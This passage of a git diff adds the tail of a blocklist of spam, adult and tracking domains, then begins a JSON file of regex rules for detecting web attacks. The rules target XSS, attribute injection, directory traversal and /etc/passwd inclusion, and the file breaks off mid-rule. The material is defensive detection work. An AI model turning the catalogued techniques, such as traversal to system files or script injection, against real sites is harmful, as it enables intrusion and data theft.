+topquality.cf
+toproadrunner5.info
+topshef.ru
+topsiteminecraft.com
+topsy.com
+topvidos.ru
+torontoplumbinggroup.com
+torrent-newgames.com
+torrent-to-magnet.com
+torrentdownloadhub.com
+torrentgamer.net
+torrentred.games
+torrents-tracker.com
+torrents.cd
+torrents.life
+torrnada.ru
+torture.ml
+totu.info
+totu.us
+touchmods.fr
+tour-line.net
+tourcroatia.co.uk
+tourismvictoria.com
+toursmaps.com
+tovaroboom.vast.ru
+toxicwap.com
+toy-shop.top
+toyota.7zap.com
+toys.erolove.in
+tozup.com
+tpu.ru
+tracfone.com
+track-rankings.online
+track.deriv.com
+track112.site
+track2.shop
+tracklead.net
+trackmedia101.com
+tracksurf.daooda.com
+tracksz.co
+trackzapper.com
+tracxn.com
+tradedeals.biz
+traderzplanet.in
+tradgardspartner.se
+trafaret74.ru
+traffic-club.info
+traffic100.com
+traffic2cash.org
+traffic2money.com
+trafficcentr.xyz
+trafficfactory.biz
+trafficgenius.xyz
+trafficinstantly.co
+trafficjunky.com
+trafficjunky.net
+trafficmania.com
+trafficmonetize.org
+trafficmp.com
+trafficnetzwerk.de
+trafficreceiver.club
+trafficshaper.com
+trafficstars.com
+traffictrade.life
+traffique.net
+traffixer.com
+traffmonster.info
+traffpartners.com
+trahic.ru
+trahvid.com
+trailer.cinemaflix.website
+trainoffend.ml
+tramadolandtizanidine.blogspot.com
+traxdom.ru
+treasuretrack-a.akamaihd.net
+tri-slona.org
+trichizobswiv.agddns.net
+trion.od.ua
+triplepanda.xyz
+tripper.de
+triumf-realty.ru
+trk-4.net
+trkdf.com
+trkur.com
+trubywriting.com
+truck-addzilla.life
+truck-land.life
+truck-rece.life
+trucri.me
+trudogolik.net
+truebeauty.cc
+truemfilelj.gq
+trumpetedextremes.com
+trustaffs.com
+trustedhealthtips.com
+trustedmaccleaner.com
+trustl.life
+try-rx.com
+tryrating.com
+tsan.net
+tsstcorpcddvdwshbbdriverfb.aircus.com
+tsyndicate.com
+tt-ipd.info
+ttrraacckkrr.com
+ttsq.fr
+tube8.com
+tubeline.biz
+tubeoffline.com
+tuberkulezanet.ru
+tuberkuleznik.ru
+tubo360.com
+tuckermktg.com
+tuckpointingmasonrysystems.com
+tula.howotorg.ru
+tula.mdverey.ru
+tupper-posuda.ru
+tupper-shop.ru
+turbabitload.weebly.com
+turbo-suslik.org
+turbodsp.com
+turist-strani.ru
+turizm.bz
+turizmus.us
+turkeyreport.tk
+turn-up-life.life
+turvgori.ru
+tv-spoty.info
+tvand.ru
+tversvet.ru
+tvnewsclips.info
+tvorozhnaja-zapekanka-recept.ru
+tvory.predmety.in.ua
+tvoystartup.ru
+tvteleport.ru
+twelvevisionspartyofcolorado.com
+twiclub.in
+twincitiescarservice.com
+twinderbella.com
+twitlinks.com
+twittrading.com
+twittruth.com
+twodollarshows.com
+twojebook.pl
+twu.com.ua
+tx41tclega.ru
+txxx.com
+typer.one
+typimga.pw
+tytoona.com
+tyumen.xrus.org
+tzritel.tk
+u-cheats.ru
+u17795.netangels.ru
+u555u.info
+ua-company.ru
+ua.tc
+uac.net.au
+uamtrk.com
+uasb.ru
+ublaze.ru
+uchebavchehii.ru
+uchetunet.su
+uchil.net
+ucoz.ru
+ucsol.ru
+udayavani.com
+udsgame.online
+ufa.xrus.org
+uggbootsoutletsale.us
+uggsale.online
+ugguk.online
+uginekologa.com
+ugogo.info
+uhdtv.website
+uhod-za-sobakoj.ru
+uhodzalijami.ru
+uk-zheu20.ru
+ukkala.xyz
+ukkelberg.no
+ukr-lit.com
+ukrobstep.com
+ukrtextbook.com
+ukrtvir.com.ua
+ukrtvory.in.ua
+ukrup.com
+ultimateclassicrock.com
+ultimatesetnewfreeallsoftupgradesystems.pw
+ultramart.biz
+um-razum.ru
+umaseh.com
+umekana.ru
+umg-stroy.ru
+umityangin.net
+umnovocaminho.com
+unacittaconte.org
+unblocksit.es
+undergroundcityphoto.com
+underthesite.com
+unece.org
+uni.me
+unimodemhalfduplefw.pen.io
+unionmarkt.de
+unisexjewelry.org
+unitexindia.com
+unitygame3d.com
+univerfiles.com
+universals.com.ua
+unlimitdocs.net
+unmaroll.ya.ru
+unpredictable.ga
+unrealcommander.biz
+unrealcommander.com
+unrealcommander.org
+uogonline.com
+upproar.com
+uprour.com
+upstore.me
+uptime-alpha.net
+uptime-as.net
+uptime-delta.net
+uptime-gamma.net
+uptime.com
+uptimebot.net
+uptimechecker.com
+upupa.net
+ural-buldozer.ru
+urccvfmc.bloger.index.hr
+urdoot.win
+urengoy.pro
+url-extractor.xyz
+url-img.link
+url2image.com
+urlcut.ru
+urldelivery.com
+urll.eu
+urlopener.blogspot.com.au
+urlopener.com
+uroffer.link
+uroki.net
+urzedowski.eu
+us-america.ru
+usacasino.com
+usadacha.net
+usbggettwku.ga
+usdx.us
+userequip.com
+usiad.net
+ussearche.cf
+usswrite.com
+ustion.ru
+utiblog.fr
+utrolive.ru
+uvozdeckych.info
+uytmaster.ru
+uzporno.mobi
+uzungil.com
+v-doc.co
+v24s.net
+v720hd.ru
+vabasa.inwtrade.com
+vacances-voyages.info
+vacuumcleanerguru.com
+vacuumscleaner.com
+vadimkravtcov.ru
+validccseller.com
+validdomain.xyz
+valkiria-tk.ru
+valmetrundan.se
+valoresito.com
+valsalud.com
+valuado.com
+valueclick.com
+vancleefreplica.pw
+vandrie-ict.nl
+vapeface.club
+vapomnoncri.tk
+vapsy.com
+varbergsvind.se
+varikoz24.com
+varikozdok.ru
+vashsvet.com
+vasileostrovsky-rayon.ru
+vavilone.com
+vbabule.net
+vbikse.com
+vbtracker.net
+vchulkah.net
+vchulkax.com
+vclicks.net
+vduplo.ru
+vedomstvo.net
+veerotech.com
+vegan-foods.us
+vegascosmetics.ru
+vektorpress.ru
+vekzdorov.ru
+velen.io
+veles.shop
+vellings.info
+velobikestock.com
+velpanex.ru
+venerologiya.com
+venta-prom.ru
+ventelnos.com
+veopornogratis.xxx
+vepad.com
+vereo.eu
+versaut.xxx-cam.webcam
+vertaform.com
+verymes.xyz
+veselokloun.ru
+vesnatehno.com
+vesnatehno.ru
+vezuviy.su
+vgoloveboli.net
+via-energy-acquistare.com
+via-energy-cumpara.com
+via-energy-order.com
+via-gra.webstarts.com
+viagengrarx.com
+viagra-soft.ru
+viagra.pp.ua
+viagraneggrx.com
+viagroid.ru
+viandpet.com
+viberdownload10.com
+viddyoze.com
+video--production.com
+video-camer.com
+video-chat.cn
+video-chat.in
+video-chat.love
+video-hollywood.ru
+video-production.com
+video-woman.com
+videochat.bz
+videochat.cafe
+videochat.life
+videochat.mx
+videochat.ph
+videochat.tv.br
+videochat.world
+videochaty.ru
+videogamesecrets.com
+videojam.tv
+videokrik.net
+videonsk.com
+videooko.weebly.com
+videos-for-your-business.com
+videosbox.ru
+videositename.com
+videospornogratisx.net
+videotuber.ru
+videtubs.pl
+vids18.site
+viel.su
+vielporno.net
+vietimgy.pw
+vigrx-original.ru
+vikistars.com
+viktoria-center.ru
+vilingstore.net
+villacoloniale.com
+villakohlanta.nu
+vinsit.ru
+vintontech.info
+vinylvault.co.uk
+vip-dom.in
+vip-file.com
+vip-parfumeria.ru
+vip.51.la
+vip2ch.com
+vipcallsgirls.com
+vipms.ru
+vipps.com.my
+vipromoffers.com
+vipsexfinders.com
+vipsiterip.org
+virtuagirl.com
+virtualbb.com
+virus-respirators.com
+virus-schutzmasken.de
+visa-china.ru
+visa-pasport.ru
+visionwell.com.cn
+visitcambridge.org
+vita.com.hr
+vitalads.net
+vitanail.ru
+viteonlusarezzo.it
+vitoriacabos.com
+viven.host.sk
+viveresaniesnelli.it
+vizag.kharkov.ua
+vizitki.net
+vk-mus.ru
+vkak.ru
+vkgaleria.com
+vkmusics.ru
+vkonche.com
+vkontaktemusic.ru
+vkontarkte.com
+vksaver-all.ru
+vksex.ru
+vladhistory.com
+vladimir.xrus.org
+vladimir.zrus.org
+vltai.com
+vmnmvzsmn.over-blog.com
+vod.com.ua
+vodaodessa.com
+voditeltrezviy.ru
+vodkoved.ru
+volgograd.xrus.org
+voloo.ru
+voloomoney.com
+voloslove.ru
+voltrknc1.com
+volume-pills.biz
+voluumtracker1.com
+voluumtrk.com
+vonradio.com
+voprosotvet24.ru
+voronezh.xrus.org
+vostoktrade.info
+vote-up.ru
+vozbujdenie.com
+vpnhowto.info
+vpnmouse.com
+vremya.eu
+vriel.batcave.net
+vrnelectro.ru
+vrotike.ru
+vroze.com
+vsdshnik.com
+vse-pesni.com
+vseigru.one
+vseigry.fun
+vsesubwaysurfers.com
+vseuznaem.com
+vsexkontakte.net
+vtc.pw
+vtcdns.com
+vuclip.com
+vucms.com
+vut.com.ru
+vvon.co.uk
+vvpg.ru
+vykup-avto-krasnodar.ru
+vykupavto-krasnodar.ru
+vysigy.su
+vzglyadriv.kg
+vzlom-na-zakaz.com
+vzlomfb.com
+vzlomsn.org
+vzlomtw.com
+vzubah.com
+vzube.com
+w-journal.ru
+w3data.co
+w3javascript.com
+w7s.ru
+wahicbefa31.soup.io
+wait3sec.org
+walkme.com
+wallpaperaccess.com
+wallpapers-best.com
+wallpapersdesk.info
+wallpapersist.com
+wallpaperstock.net
+walpaperlist.com
+wanker.us
+wapsite.me
+wardreapptokone.tk
+wareseeker.com
+warezaccess.com
+warezkeeper.com
+warning.or.kr
+warningwar.ru
+warningzscaler.heraeus.com
+watch-movies.ru
+watchdogs-2.ru
+watchinf.com
+watchmyfb.pl
+watchmygf.net
+waterefficiency.co
+waterpurifier.club
+watracker.net
+watsonrealtycorp.com
+waycash.net
+waysbetter.cn
+wcb.su
+wdfdocando.com
+wdrake.com
+we-are-gamers.com
+web-analytics.date
+web-betting.ru
+web.cvut.cz
+webads.co.nz
+webadvance.club
+webalan.ru
+webcamdevochka.com
+webcamtalk.net
+webenlace.com.ar
+webextract.profound.net
+webinstantservice.com
+webix.biz
+webix.me
+webjam.com
+webkeyit.com
+weblibrary.win
+weblo.com
+webmasterhome.cn
+webmasters.stackexchange.com
+webmonetizer.net
+webnode.me
+weboptimizes.com
+webpromotion.ae
+webradiology.ru
+webs.com
+webscouter.net
+webshoppermac.com
+website-analytics.online
+website-analyzer.info
+website-audit.com.ua
+website-datenbank.de
+website-speed-check.site
+website-speed-checker.site
+website-speed-up.site
+website-speed-up.top
+website-stealer.nufaq.com
+websiteaccountant.de
+websiteexplorer.info
+websites-reviews.com
+websitevaluebot.com
+webstatsdomain.org
+webtherapy.ru
+weburlopener.com
+weburok.com
+wechatdownload10.com
+weclipart.com
+wedding-salon.net
+wedding0venues.tk
+weddingdresses.xyz
+weekes.biz.tc
+weightatraining.com
+wejdz-tu.pl
+welck.octopis.com
+welcomeauto.ru
+wellcome2slovenia.ru
+wemarketing.se
+wemedinc.com
+weprik.ru
+wesharepics.com
+wesharepics.info
+wesharepics.site
+westen-v.life
+westen-z.life
+westermarkanjou.se
+westsextube.com
+westum.se
+westvilletowingservices.co.za
+wetgames.ru
+wfb.hatedriveapart.com
+whatistizanidine2mg.blogspot.com
+whatistizanidinehclusedfor.blogspot.com
+whatsappbot.flyland.ru
+whatsappdownload10.com
+whatsupinfoley.com
+whatzmyip.net
+wheelchairliftsarea.com
+whengirlsgowild.com
+where-toget.com
+whereiskentoday.com
+whereverdesperate.gq
+while.cheapwebsitehoster.com
+whipme.yopoint.in
+white-truck.life
+whiteelephantwellington.com
+whiteproduct.com
+wholesalecheapjerseysfree.com
+wholesalejerseychinaoutlet.com
+wholesalejerseychinashop.com
+wholesalejerseys-cheapest.com
+wholesalejerseyscheapjerseys.us.com
+wholesalejerseysgaa.com
+wholesalenfljerseys.us.com
+wholinkstome.com
+whos.amung.us
+whosonmyserver.com
+wieseversa.no
+wikes.20fr.com
+wildcattube.com
+wildnatureimages.com
+wildworld.site
+williamrobsonproperty.com
+win-spy.com
+windowssearch-exp.com
+wineitudes.wordpress.com
+wineration.com
+wingsoffury2.com
+wingsofrefuge.net
+winner7777.net
+winterclassichockeyjerseys.com
+winwotgold.pl
+winx-play.ru
+wiosenny-bon-1500.pl
+witclub.info
+witherrom55.eklablog.fr
+withstandingheartwarming.com
+wjgony.com
+wladimirpayen.com
+wleuaprpxuvr.ga
+wma-x.com
+wnhjavlhezp.gq
+wnoz.de
+womama.ru
+woman-h.ru
+woman-orgasm.ru
+woman-tampon.ru
+womens-journal.net
+womensplay.net
+womensterritory.ru
+wonderfulflowers.biz
+woodyguthrie.se
+word-vorlagen.net
+word-vorlagen.xyz
+wordkeyhelper.com
+wordpress-crew.net
+wordpresscore.com
+workle.website
+works.if.ua
+world-mmo.com
+worldhistory.biz
+worldinternetauthority.com
+worldis.me
+worldlovers.ru
+worldmusicfests.com
+worldoffiles.ru
+worldtraveler.world
+wormix-cheats.ru
+worst-sites.online
+wosik-dach.service-for-web.de
+wovis.site
+wowas31.ucoz.ru
+wowcasinoonline.ooo
+woweb.com.ua
+wpsecurity.website
+wpthemedetector.co.uk
+writersgroup580.web.fc2.com
+writingservices17.blogspot.ru
+wrona.it
+wrz0iuebwhp5fg.freeddns.com
+ws.ampower.me
+wsgames.ru
+wstroika.ru
+wtsindia.in
+wttavern.com
+wufak.com
+wurr.voila.net
+ww1943.ru
+ww2awards.info
+www.888.com
+www.arenda-yeisk.ru
+www.bookmaker-bets.com
+www.ehscloud.cn
+www.event-tracking.com
+www.get-free-traffic-now.com
+www.jbetting.com
+www.kabbalah-red-bracelets.com
+www.labves.ru
+www.pinnacle-bets.com
+www.solartek.ru
+www.souvenirua.com
+www.timer4web.com
+www.wohnkabinen-shop.de
+wwwadultcheck.com
+wygraj-skiny.win
+wygraj-teraz.com
+wyniki-lista.pl
+wzgyyq.com
+x-diesel.biz
+x-diesel.com
+x-diesel.info
+x-diesel.org
+x-lime.com
+x-lime.net
+x-mix.info
+x-musics.com
+x-porno.video
+x-rates.ru
+x-stars.ru
+x-true.info
+x5market.ru
+x69ty.ru
+xaijo.com
+xaylapdiendanang.com
+xbaboon.com
+xblog.in
+xblognetwork.com
+xboxster.ru
+xcc24.pl
+xchangetrak.com
+xchat26.myfreecams.com
+xclicks.net
+xcombear.ru
+xdoza.com
+xedserver.com
+xep.info
+xerox-douglas.cf
+xev.ru
+xfire.com
+xfluro.com
+xgames-04.com
+xgftnlrt.bloger.index.hr
+xingzi-vision.com
+xitjw.info
+xjlottery.com
+xjrul.com
+xkaz.org
+xlolitka.com
+xlovecam.com
+xmladserver.com
+xmlinde.com
+xmnb.net
+xmronta.com
+xn------7cdbapdecfd4ak1bn0amjffj7afu3y.xn--p1ai
+xn-----6kcaabbafhu7cskl7akvongwpo7hvjj.xn--p1ai
+xn-----6kcaacnblni5c5bicdpcmficy.xn--p1ai
+xn-----6kccaibs5cb8afhjrfmix2n.xn--p1ai
+xn-----7kcabaipgeakzcss7bjdqdwpfnhv.xn--p1ai
+xn-----7kceclhb4abre1b4a0ccl2fxch1a.xn--p1ai
+xn-----8kcatubaocd1bneepefojs1h2e.xn--p1ai
+xn----7sbaaabaei0cc8aj5bj0bncejx.xn--p1ai
+xn----7sbahjd3btneuw1joc.xn--p1ai
+xn----7sbaphztdjeboffeiof6c.xn--p1ai
+xn----7sbbagbq7bd5aheftfllo4m.xn--p1ai
+xn----7sbbahaq9bb5afgiqfliv4m.xn--p1ai
+xn----7sbho2agebbhlivy.xn--p1ai
+xn----7sbifcamovvfggw9d.xn--p1ai
+xn----8sbarihbihxpxqgaf0g1e.xn--80adxhks
+xn----8sbdbjgb1ap7a9c4czbh.xn--p1acf
+xn----8sbhefaln6acifdaon5c6f4axh.xn--p1ai
+xn----8sblgmbj1a1bk8l.xn----161-4vemb6cjl7anbaea3afninj.xn--p1ai
+xn----9sbebi2bvzr7h.xn--p1ai
+xn----9sbubg3ambdfl1j.xn--p1ai
+xn----btbdvdh4aafrfciljm6k.xn--p1ai
+xn----ctbbcjd3dbsehgi.xn--p1ai
+xn----ctbigni3aj4h.xn--p1ai
+xn----dtbndd4ae7eub.top
+xn----itbeirbjbi7bc6bh2d.xn--p1ai
+xn----itbkqkfiq.xn--p1ai
+xn--1-8sbcpb0bdm8k6a.xn--p1ai
+xn--24-glceagatoq7c2a6ioc.xn--p1ai
+xn--80aaafbn2bc2ahdfrfkln6l.xn--p1ai
+xn--80aaagvmjabrs1aoc9luc.xn--p1ai
+xn--80aaajbdbddwj2alwjieei2afr3v.xn--p1ai
+xn--80aaaks3bbhabgbigamdr2h.xn--p1ai
+xn--80aafb2a.xn--p1ai
+xn--80aagddcgkbcqbad7amllnejg6dya.xn--p1ai
+xn--80aanaardaperhcem4a6i.com
+xn--80ab4aa2g.xn--p1ai
+xn--80abgj3a5acid6ghs.top
+xn--80adaggc5bdhlfamsfdij4p7b.xn--p1ai
+xn--80aeahghtf8ac5i.xn--p1ai
+xn--80aebbcbcdemfkhba4byaehoejh8dza3v.xn--p1ai
+xn--80ahdheogk5l.xn--p1ai
+xn--80ahvj9e.xn--p1ai
+xn--80aikhbrhr.net
+xn--80ajbshivpvn2i.xn--p1ai
+xn--80ajjbdhgmudixfjc8c5a9df8b.xn--p1ai
+xn--80ak6aa92e.com
+xn--80aodinpgi.xn--p1ai
+xn--80atua3d.xn--p1ai
+xn--90acenikpebbdd4f6d.xn--p1ai
+xn--b1adccaf1bzj.xn--p1ai
+xn--b1addnj3cah.xn--p1ai
+xn--b1ag5cfn.xn--p1ai
+xn--b1agm2d.net
+xn--c1acygb.xn--p1ai
+xn--d1abj0abs9d.in.ua
+xn--d1acah0c.xn--p1ai
+xn--d1aifoe0a9a.top
+xn--e1afanlbnfckd7c3d.xn--p1ai
+xn--e1aggki3c.xn--80adxhks
+xn--h1aakne2ba.xn--p1ai
+xn--h1ahbi.com.ua
+xn--hxazdsfy.blogspot.com
+xn--l1aengat.xn--p1ai
+xn--lifehacer-1rb.com
+xn--oogle-wmc.com
+xn--q1a.xn--b1aube0e.xn--c1acygb.xn--p1ai
+xnxx-n.com
+xnxx699.com
+xnxxandxvideos.com
+xolodremont.ru
+xportvusbdriver8i.snack.ws
+xpresscare.ru
+xrus.org
+xsfetish.org
+xsion.net
+xtraffic.plus
+xtrafficplus.com
+xtremeeagles.net
+xtube.com
+xtubeporno.net
+xuki.us
+xvideosbay.com
+xvideosporn.biz
+xvideospornoru.com
+xwatt.ru
+xxart.ru
+xxlargepop.com
+xxx-cam.webcam
+xxx-treker.ru
+xxxasianporn.net
+xxxdatinglocal.us
+xxxguitars.com
+xxxhdvideo.site
+xxxkaz.org
+xxxmania.top
+xxxnatelefon.ru
+xxxrus.org
+xxxsiterips.xyz
+xxxtube69.com
+xxxtubesafari.com
+xz618.com
+xzlive.com
+y8games-free.com
+yaaknaa.info
+yachts-cruise.info
+yaderenergy.ru
+yadro.ru
+yaminecraft.ru
+yaoguangdj.com
+yatrk.xyz
+yeartwit.com
+yebocasino.co.za
+yebocasino.com
+yellocloud.be
+yellowads.men
+yellowfootprints.com
+yellowproxy.net
+yellowstonesafaritours.com
+yellowstonevisitortours.com
+yes-com.com
+yginekologa.com
+yhit.press
+ynymnwbm.bloger.index.hr
+yogamatsexpert.com
+yoluxuryevents.com
+yoopsie.com
+yopoint.in
+yoshkarola.zrus.org
+yottos.com
+you-shall-not-pass.is74.ru
+youandcredit.ru
+youbloodyripper.com
+youbrainboost.asia
+youdao.com
+youdesigner.kz
+yougame.biz
+yougetsignal.com
+youghbould.wordpress.com
+yougotanewdomain.com
+youjizz.com
+youjizz.vc
+youporn-forum.ga
+youporn-ru.com
+your-bearings.com
+youradexchange.com
+yourads.website
+youradulthosting.com
+youraticles.pl
+yourdesires.ru
+youresponsive.com
+yourmovies.pl
+yourothersite.com
+yourporn.com
+yourporngay.com
+yoursearch.me
+yourserverisdown.com
+yoursite.com
+yourtemplatefinder.com
+yousense.info
+youthreaders.com
+youtoner.it
+youtube-downloader.savetubevideo.com
+youtubedownload.org
+youtubologia.it
+youtuhe.com
+ypmuseum.ru
+ytmnd.com
+yuarra.pluto.ro
+yubikk.info
+yugk.net
+yugo-star.ru
+yun56.co
+yunque.pluto.ro
+yur-p.ru
+yurgorod.ru
+yuweng.info
+z-master.ru
+za-fun-offer.com
+za-music.mymobiplanet.com
+zaapplesales.blogspot.com
+zacreditom.ru
+zagadki.in.ua
+zahvat.ru
+zaidia.xhost.ro
+zaim-pod-zalog-krasnodar.ru
+zaimhelp.ru
+zaimite.ru
+zajm-pod-zalog-nedvizhimosti.ru
+zajm-zalog-krasnodar.ru
+zakazfutbolki.com
+zakazvzloma.com
+zakon-ob-obrazovanii.ru
+zakonobosago.ru
+zaloadi.ru
+zaloro.com
+zambini.ru
+zaobao.com.sg
+zapatosenventa.info
+zapiszto.pl
+zarabiaj-dzis.pl
+zarabotat-na-sajte.ru
+zarabotok--doma.ru
+zarajbuilders.com
+zarenica.net
+zarepta.com
+zastenchivosti.net
+zastroyka.org
+zatjmuzu.info
+zawyna.ua
+zazagames.org
+zdesformula.ru
+zdesoboi.com
+zebradudka.com
+zebramart.ru
+zed21.net
+zeg-distribution.com
+zeikopay.com
+zeleznobeton.ru
+zero1.it
+zerocash.msk.ru
+zeroredirect.com
+zeroredirect1.com
+zeroredirect10.com
+zeroredirect11.com
+zeroredirect12.com
+zeroredirect2.com
+zeroredirect5.com
+zeroredirect6.com
+zeroredirect7.com
+zeroredirect8.com
+zeroredirect9.com
+zetgie.com.pl
+zetmaster.ru
+zhacker.net
+zhongwenlink.com
+zhorapankratov7.blogspot.com
+zhuravlev.info
+zigarettenonl.canalblog.com
+zigarettenonlinekaufen.tumblr.com
+zigarettenonlinekaufen1.bloog.pl
+zigarettenonlinekaufen1.blox.pl
+zigarettenonlinekaufen2.bloog.pl
+zigarettenonlinekaufen2.drupalgardens.com
+zigzog.ru
+zionstar.net
+zirondelli.it
+zixizop.net.ru
+zkjovpdgxivg.ga
+zlatnajesen.com
+zmoda.hostreo.com
+znakom.sibtest.ru
+znakomstva-moskva77.ru
+znakomstva-piter78.ru
+znakomstvaonlain.ru
+znaniyapolza.ru
+znaturaloriginal.com
+zocaparj.kz
+zog.link
+zojirushi-products.ru
+zolotoy-lis.ru
+zona-aqua.ru
+zone-kev717.info
+zoodrawings.com
+zoogdiesney.com
+zoogdinsney.com
+zoogdisany.com
+zooggames.com
+zoolubimets.ru
+zoominfo.com
+zoomovies.org
+zoompegs.com
+zoosexart.com
+zootoplist.com
+zootravel.com
+zophim.me
+zrelaya.pw
+zreloeporno.tv
+zrizvtrnpale.tk
+zrus.org
+zryydi.com
+zs2vm.top
+zscaler.net
+zscalerone.net
+zscalertwo.net
+zskdla.site
+zverokruh-shop.cz
+zvetki.ru
+zvezdagedon.ru
+zvooq.eu
+zvuker.net
+zx6.ru
+zygophyceous.womanstars.site
+zynax.ua
+zytpirwai.net
+zzbroya.com.ua
+zzlgxh.com
\ No newline at end of file
diff --git a/db/common-web-attacks.json b/db/common-web-attacks.json
new file mode 100644
index 00000000..70cad69c
--- /dev/null
+++ b/db/common-web-attacks.json
@@ -0,0 +1 @@
+{"filters":[{"id":1,"rule":"(?:\"[^\"]*[^-]?>)|(?:[^\\w\\s]\\s*\\/>)|(?:>\")","description":"finds html breaking injections including whitespace attacks","tags":["xss","csrf"],"impact":4},{"id":2,"rule":"(?:\"+.*[<=]\\s*\"[^\"]+\")|(?:\"\\s*\\w+\\s*=)|(?:>\\w=\\/)|(?:#.+\\)[\"\\s]*>)|(?:\"\\s*(?:src|style|on\\w+)\\s*=\\s*\")|(?:[^\"]?\"[,;\\s]+\\w*[\\[\\(])","description":"finds attribute breaking injections including whitespace attacks","tags":["xss","csrf"],"impact":4},{"id":3,"rule":"(?:^>[\\w\\s]*<\\/?\\w{2,}>)","description":"finds unquoted attribute breaking injections","tags":["xss","csrf"],"impact":2},{"id":4,"rule":"(?:[+\\/]\\s*name[\\W\\d]*[)+])|(?:;\\W*url\\s*=)|(?:[^\\w\\s\\/?:>]\\s*(?:location|referrer|name)\\s*[^\\/\\w\\s-])","description":"Detects url-, name-, JSON, and referrer-contained payload attacks","tags":["xss","csrf"],"impact":5},{"id":5,"rule":"(?:\\W\\s*hash\\s*[^\\w\\s-])|(?:\\w+=\\W*[^,]*,[^\\s(]\\s*\\()|(?:\\?\"[^\\s\"]\":)|(?:(?<!\\/)__[a-z]+__)|(?:(?:^|[\\s)\\]\\}])(?:s|g)etter\\s*=)","description":"Detects hash-contained xss payload attacks, setter usage and property overloading","tags":["xss","csrf"],"impact":5},{"id":6,"rule":"(?:with\\s*\\(\\s*.+\\s*\\)\\s*\\w+\\s*\\()|(?:(?:do|while|for)\\s*\\([^)]*\\)\\s*\\{)|(?:\\/[\\w\\s]*\\[\\W*\\w)","description":"Detects self contained xss via with(), common loops and regex to string conversion","tags":["xss","csrf"],"impact":5},{"id":7,"rule":"(?:[=(].+\\?.+:)|(?:with\\([^)]*\\)\\))|(?:\\.\\s*source\\W)","description":"Detects JavaScript with(), ternary operators and XML predicate attacks","tags":["xss","csrf"],"impact":5},{"id":8,"rule":"(?:\\/\\w*\\s*\\)\\s*\\()|(?:\\([\\w\\s]+\\([\\w\\s]+\\)[\\w\\s]+\\))|(?:(?<!(?:mozilla\\/\\d\\.\\d\\s))\\([^)[]+\\[[^\\]]+\\][^)]*\\))|(?:[^\\s!][{([][^({[]+[{([][^}\\])]+[}\\])][\\s+\",\\d]*[}\\])])|(?:\"\\)?\\]\\W*\\[)|(?:=\\s*[^\\s:;]+\\s*[{([][^}\\])]+[}\\])];)","description":"Detects self-executing JavaScript functions","tags":["xss","csrf"],"impact":5},{"id":9,"rule":"(?i)(?:\\\\u(?:\\{(0{1,})?[a-f0-9]{2}\\}|00[a-f0-9]{2}))|(?:\\\\x0*[a-f0-9]{2})|(?:\\\\\\d{2,3})","description":"Detects the IE octal, hex and unicode entities","tags":["xss","csrf"],"impact":2},{"id":10,"rule":"(?:(?:\\/|\\\\)?\\.+(\\/|\\\\)(?:\\.+)?)|(?:\\w+\\.exe\\??\\s)|(?:;\\s*\\w+\\s*\\/[\\w*-]+\\/)|(?:\\d\\.\\dx\\|)|(?:%(?:c0\\.|af\\.|5c\\.))|(?:\\/(?:%2e){2})","description":"Detects basic directory traversal","tags":["dt","id","lfi"],"impact":5},{"id":11,"rule":"(?:%c0%ae\\/)|(?:(?:\\/|\\\\)(home|conf|usr|etc|proc|opt|s?bin|local|dev|tmp|kern|[br]oot|sys|system|windows|winnt|program|%[a-z_-]{3,}%)(?:\\/|\\\\))|(?:(?:\\/|\\\\)inetpub|localstart\\.asp|boot\\.ini)","description":"Detects specific directory and path traversal","tags":["dt","id","lfi"],"impact":5},{"id":12,"rule":"(?:etc\\/\\W*passwd)","description":"Detects etc/passwd inclusion attempts","tags":["dt","id","lfi"],"impact":5},{"id":13,"rule":"(?:%u(?:ff|00|e\\d)\\w\\w)|(?:(?:%(?:e\\w|c[^3\\W]|))(?:%\\w\\w)(?:%\\w\\w)?)","description":"Detects halfwidth/fullwidth encoded unicode HTML breaking attempts","tags":["xss","csrf"],"impact":3},{"id":14,"rule":"(?:#@~\\^\\w+)|(?:\\w+script:|@?import\\s*\\(?|;base64|base64,)|(?:\\w\\s*\\([\\w\\s]+,[\\w\\s]+,[\\w\\s]+,[\\w\\s]+,[\\w\\s]+,[\\w\\s]+\\))","description":"Detects possible includes, VBSCript/JScript encoded and packed functions","tags":["xss","csrf","id","rfe"],"impact":5},{"id":15,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@\\-\\|])(\\s*return\\s*)?(?:create(?:element|attribute|textnode)|[a-z]+events?|setattribute|getelement\\w+|appendchild|createrange|createcontextualfragment|removenode|parentnode|decodeuricomponent|\\wettimeout|(?:ms)?setimmediate|option|useragent)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%\",.+\\-]))","description":"Detects JavaScript DOM/miscellaneous properties and methods","tags":["xss","csrf","id","rfe"],"impact":6},{"id":16,"rule":"([^*\\s\\w,.\\/?+-]\\s*)?(?<![a-mo-z]\\s)(?<![a-z\\/_@])(\\s*return\\s*)?(?:alert|inputbox|showmod(?:al|eless)dialog|showhelp|infinity|isnan|isnull|iterator|msgbox|executeglobal|expression|prompt|write(?:ln)?|confirm|dialog|urn|(?:un)?eval|exec|execscript|tostring|status|execute|window|unescape|navigate|jquery|getscript|extend|prototype)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%\",.:\\/+\\-]))","description":"Detects possible includes and typical script methods","tags":["xss","csrf","id","rfe"],"impact":5},{"id":17,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@])(\\s*return\\s*)?(?:hash|name|href|navigateandfind|source|pathname|close|constructor|port|protocol|assign|replace|back|forward|document|ownerdocument|window|top|this|self|parent|frames|_?content|date|cookie|innerhtml|innertext|csstext+?|outerhtml|print|moveby|resizeto|createstylesheet|stylesheets)(?(1)[^\\w%\"]|(?:\\s*[^@\\/\\s\\w%.+\\-])['\"`])","description":"Detects JavaScript object properties and methods","tags":["xss","csrf","id","rfe"],"impact":4},{"id":18,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@\\-\\|])(\\s*return\\s*)?(?:join|pop|push|reverse|reduce|concat|map|shift|sp?lice|sort|unshift)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%,.+\\-]))","description":"Detects JavaScript array properties and 